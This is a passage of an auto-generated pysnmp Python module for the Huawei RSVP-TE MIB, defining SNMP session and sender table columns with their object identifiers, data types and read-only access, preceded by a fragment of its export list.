hwRsvpTeIfRefreshBlockadeMultiple=hwRsvpTeIfRefreshBlockadeMultiple, hwRsvpTeNbrGrRecoveryTime=hwRsvpTeNbrGrRecoveryTime, hwRsvpTeEroIpAddr=hwRsvpTeEroIpAddr, hwRsvpTeIfRouteDelay=hwRsvpTeIfRouteDelay, hwRsvpTeSenderAdspecCtrlLoadMtu=hwRsvpTeSenderAdspecCtrlLoadMtu, hwRsvpTeSessionRequests=hwRsvpTeSessionRequests, hwRsvpTeSessionSenders=hwRsvpTeSessionSenders, hwRsvpTeSenderEntry=hwRsvpTeSenderEntry, hwRsvpTeSenderRsvpHop=hwRsvpTeSenderRsvpHop, hwRsvpTeTrapGroup=hwRsvpTeTrapGroup, hwRsvpTeIfNbrCurrentCount=hwRsvpTeIfNbrCurrentCount, hwRsvpTeNbrProtocol=hwRsvpTeNbrProtocol, hwRsvpTeMessageIdTable=hwRsvpTeMessageIdTable, hwRsvpTeRroNumber=hwRsvpTeRroNumber, hwRsvpTeSenderLabelRequestFrMinDlci=hwRsvpTeSenderLabelRequestFrMinDlci, hwRsvpTeResvFwdDestAddr=hwRsvpTeResvFwdDestAddr, hwRsvpTeIfStatus=hwRsvpTeIfStatus, hwRsvpTeResvType=hwRsvpTeResvType, hwRsvpTeSessionDestAddr=hwRsvpTeSessionDestAddr, hwRsvpTeResvEntry=hwRsvpTeResvEntry, hwRsvpTeIfAuthEncrypted=hwRsvpTeIfAuthEncrypted, hwRsvpTeRroGroup=hwRsvpTeRroGroup, hwRsvpTeSenderType=hwRsvpTeSenderType, hwRsvpTeSenderFrrIncludeAny=hwRsvpTeSenderFrrIncludeAny, hwRsvpTeSenderSessionAttrType=hwRsvpTeSenderSessionAttrType, hwRsvpTeMessageIdNumber=hwRsvpTeMessageIdNumber, hwRsvpTeSenderLabelRequestAtmMaxVpi=hwRsvpTeSenderLabelRequestAtmMaxVpi, hwRsvpTeFilterSpecIngressLsrId=hwRsvpTeFilterSpecIngressLsrId, hwRsvpTeRroEntry=hwRsvpTeRroEntry, hwRsvpTeResvFwdRSpecRate=hwRsvpTeResvFwdRSpecRate, hwRsvpTe=hwRsvpTe, hwRsvpTeResvFwdHopLih=hwRsvpTeResvFwdHopLih, hwRsvpTeNbrHelloDstInstance=hwRsvpTeNbrHelloDstInstance, hwRsvpTeSessionNumber=hwRsvpTeSessionNumber, hwRsvpTeSessionEntry=hwRsvpTeSessionEntry, hwRsvpTeSenderMsgIdSndNumber=hwRsvpTeSenderMsgIdSndNumber, hwRsvpTeIfUdpNbrs=hwRsvpTeIfUdpNbrs, hwRsvpTeResvShared=hwRsvpTeResvShared, hwRsvpTeSenderAdspecPathBw=hwRsvpTeSenderAdspecPathBw, hwRsvpTeIfRetranInterval=hwRsvpTeIfRetranInterval, hwRsvpTeFilterSpecTable=hwRsvpTeFilterSpecTable, hwRsvpTeResvScope=hwRsvpTeResvScope, hwRsvpTeNbrGroup=hwRsvpTeNbrGroup, hwRsvpTeCompliance=hwRsvpTeCompliance, hwRsvpTeSessionTable=hwRsvpTeSessionTable, hwRsvpTeNbrHelloSrcInstance=hwRsvpTeNbrHelloSrcInstance, hwRsvpTeEroType=hwRsvpTeEroType, hwRsvpTeSenderAdspecGuaranteedMinLatency=hwRsvpTeSenderAdspecGuaranteedMinLatency, hwRsvpTeAuthFail=hwRsvpTeAuthFail, hwRsvpTeSenderFrrInuseFlag=hwRsvpTeSenderFrrInuseFlag, hwRsvpTeSenderMsgIdRcvFlag=hwRsvpTeSenderMsgIdRcvFlag, hwRsvpTeResvFwdTSpecPeakRate=hwRsvpTeResvFwdTSpecPeakRate, hwRsvpTeResvService=hwRsvpTeResvService, hwRsvpTeResvPolicy=hwRsvpTeResvPolicy, hwRsvpTeNbrAuthKeyId=hwRsvpTeNbrAuthKeyId, hwRsvpTeRroLabel=hwRsvpTeRroLabel, hwRsvpTeSenderFrrIncludeAll=hwRsvpTeSenderFrrIncludeAll, hwRsvpTeSenderClassType=hwRsvpTeSenderClassType, hwRsvpTeSenderSessionAttrExcludeAny=hwRsvpTeSenderSessionAttrExcludeAny, 
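# HUAWEI-RSVPTE-MIB, compiled into a pysnmp module (pysmi output). The imports
# below pull in the base ASN.1 types, SMI constructs and textual conventions
# this MIB builds on. Usage sketch (hypothetical, not part of the generated
# module): once this file is on the pysnmp MIB search path, its symbols can be
# resolved by name, e.g.
#
#     from pysnmp.smi import builder
#     mb = builder.MibBuilder()
#     mb.loadModules('HUAWEI-RSVPTE-MIB')
#     (sessionTable,) = mb.importSymbols('HUAWEI-RSVPTE-MIB',
#                                        'hwRsvpTeSessionTable')
#     print(sessionTable.getName())  # (1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1)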
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
BitRate, MessageSize, QosService, BurstSize, SessionType = mibBuilder.importSymbols("INTEGRATED-SERVICES-MIB", "BitRate", "MessageSize", "QosService", "BurstSize", "SessionType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Integer32, Unsigned32, MibIdentifier, Counter64, Counter32, TimeTicks, IpAddress, ModuleIdentity, iso, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, NotificationType, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Unsigned32", "MibIdentifier", "Counter64", "Counter32", "TimeTicks", "IpAddress", "ModuleIdentity", "iso", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "NotificationType", "Bits")
DisplayString, TruthValue, TimeStamp, TimeInterval, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TimeStamp", "TimeInterval", "TextualConvention", "RowStatus")
hwRsvpTe = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148))
hwRsvpTe.setRevisions(('2014-10-25 17:36', '2014-06-16 14:55', '2013-08-28 17:55',))
if mibBuilder.loadTexts: hwRsvpTe.setLastUpdated('201410251736Z')
if mibBuilder.loadTexts: hwRsvpTe.setOrganization('Huawei Technologies Co.,Ltd.')
hwRsvpTeObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1))
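# hwRsvpTeSessionTable: one row per RSVP-TE session, indexed by
# hwRsvpTeSessionNumber. Columns expose the session type, destination address,
# sender/receiver/request counts, tunnel ids and reservation style (FF/WF/SE).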
hwRsvpTeSessionTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1), )
if mibBuilder.loadTexts: hwRsvpTeSessionTable.setStatus('current')
hwRsvpTeSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"))
if mibBuilder.loadTexts: hwRsvpTeSessionEntry.setStatus('current')
hwRsvpTeSessionNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSessionNumber.setStatus('current')
hwRsvpTeSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionType.setStatus('current')
hwRsvpTeSessionDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddr.setStatus('current')
hwRsvpTeSessionDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddrLength.setStatus('current')
hwRsvpTeSessionSenders = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionSenders.setStatus('current')
hwRsvpTeSessionReceivers = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionReceivers.setStatus('current')
hwRsvpTeSessionRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionRequests.setStatus('current')
hwRsvpTeSessionTunnelId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelId.setStatus('current')
hwRsvpTeSessionTunnelExtId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelExtId.setStatus('current')
hwRsvpTeSessionLspsNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionLspsNumber.setStatus('current')
hwRsvpTeSessionStyle = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(10, 17, 18))).clone(namedValues=NamedValues(("ff", 10), ("wf", 17), ("se", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionStyle.setStatus('current')
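# hwRsvpTeSenderTable: per-sender (PATH) state within a session, indexed by
# (hwRsvpTeSessionNumber, hwRsvpTeSenderNumber): sender TSpec, ADSPEC for the
# guaranteed and controlled-load services, message ids, label request,
# session attributes and fast-reroute (FRR) parameters.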
hwRsvpTeSenderTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2), )
if mibBuilder.loadTexts: hwRsvpTeSenderTable.setStatus('current')
hwRsvpTeSenderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"))
if mibBuilder.loadTexts: hwRsvpTeSenderEntry.setStatus('current')
hwRsvpTeSenderNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSenderNumber.setStatus('current')
hwRsvpTeSenderType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderType.setStatus('current')
hwRsvpTeSenderDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddr.setStatus('current')
hwRsvpTeSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddr.setStatus('current')
hwRsvpTeSenderDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddrLength.setStatus('current')
hwRsvpTeSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddrLength.setStatus('current')
hwRsvpTeSenderHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopAddr.setStatus('current')
hwRsvpTeSenderHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopLih.setStatus('current')
hwRsvpTeSenderInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterface.setStatus('current')
hwRsvpTeSenderTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 10), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecRate.setStatus('current')
hwRsvpTeSenderTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecPeakRate.setStatus('current')
hwRsvpTeSenderTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 12), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecBurst.setStatus('current')
hwRsvpTeSenderTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 13), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMinTu.setStatus('current')
hwRsvpTeSenderTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMaxTu.setStatus('current')
hwRsvpTeSenderInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterval.setStatus('current')
hwRsvpTeSenderRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderRsvpHop.setStatus('current')
hwRsvpTeSenderPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 17), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65532))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderPolicy.setStatus('current')
hwRsvpTeSenderAdspecBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecBreak.setStatus('current')
hwRsvpTeSenderAdspecHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecHopCount.setStatus('current')
hwRsvpTeSenderAdspecPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 20), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecPathBw.setStatus('current')
hwRsvpTeSenderAdspecMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 21), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMinLatency.setStatus('current')
hwRsvpTeSenderAdspecMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 22), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMtu.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedSvc.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedBreak.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 25), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 26), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 27), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 28), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedHopCount.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 30), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedPathBw.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 31), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMinLatency.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 32), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMtu.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadSvc.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 34), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadBreak.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 35), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadHopCount.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 36), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadPathBw.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 37), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMinLatency.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 38), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMtu.setStatus('current')
hwRsvpTeSenderTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 39), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTtl.setStatus('current')
hwRsvpTeLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 40), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeLspId.setStatus('current')
hwRsvpTeSenderMsgIdSndFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 41), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndFlag.setStatus('current')
hwRsvpTeSenderMsgIdSndEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 42), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndEpoch.setStatus('current')
hwRsvpTeSenderMsgIdSndNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 43), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndNumber.setStatus('current')
hwRsvpTeSenderMsgIdRcvFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 44), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvFlag.setStatus('current')
hwRsvpTeSenderMsgIdRcvEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 45), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvEpoch.setStatus('current')
hwRsvpTeSenderMsgIdRcvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 46), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvNumber.setStatus('current')
hwRsvpTeSenderClassType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 47), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderClassType.setStatus('current')
hwRsvpTeSenderLabelRequestCtype = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("withoutLabelRange", 1), ("withAtmLabelRange", 2), ("withFrameRelayLabelRange", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestCtype.setStatus('current')
hwRsvpTeSenderLabelRequestL3pid = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 49), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestL3pid.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 50), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 51), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVci.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 52), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 53), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMinDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 54), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMinDlci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMaxDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 55), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMaxDlci.setStatus('current')
hwRsvpTeSenderSessionAttrType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 7))).clone(namedValues=NamedValues(("withRa", 1), ("withoutRa", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrType.setStatus('current')
hwRsvpTeSenderSessionAttrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 57), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrSetupPrio.setStatus('current')
hwRsvpTeSenderSessionAttrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 58), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrHoldPrio.setStatus('current')
hwRsvpTeSenderSessionAttrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 59), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrFlag.setStatus('current')
hwRsvpTeSenderSessionAttrName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 60), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrName.setStatus('current')
hwRsvpTeSenderSessionAttrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 61), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrExcludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 62), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 63), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 64), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrSetupPrio.setStatus('current')
hwRsvpTeSenderFrrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 65), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHoldPrio.setStatus('current')
hwRsvpTeSenderFrrHopLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 66), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHopLimit.setStatus('current')
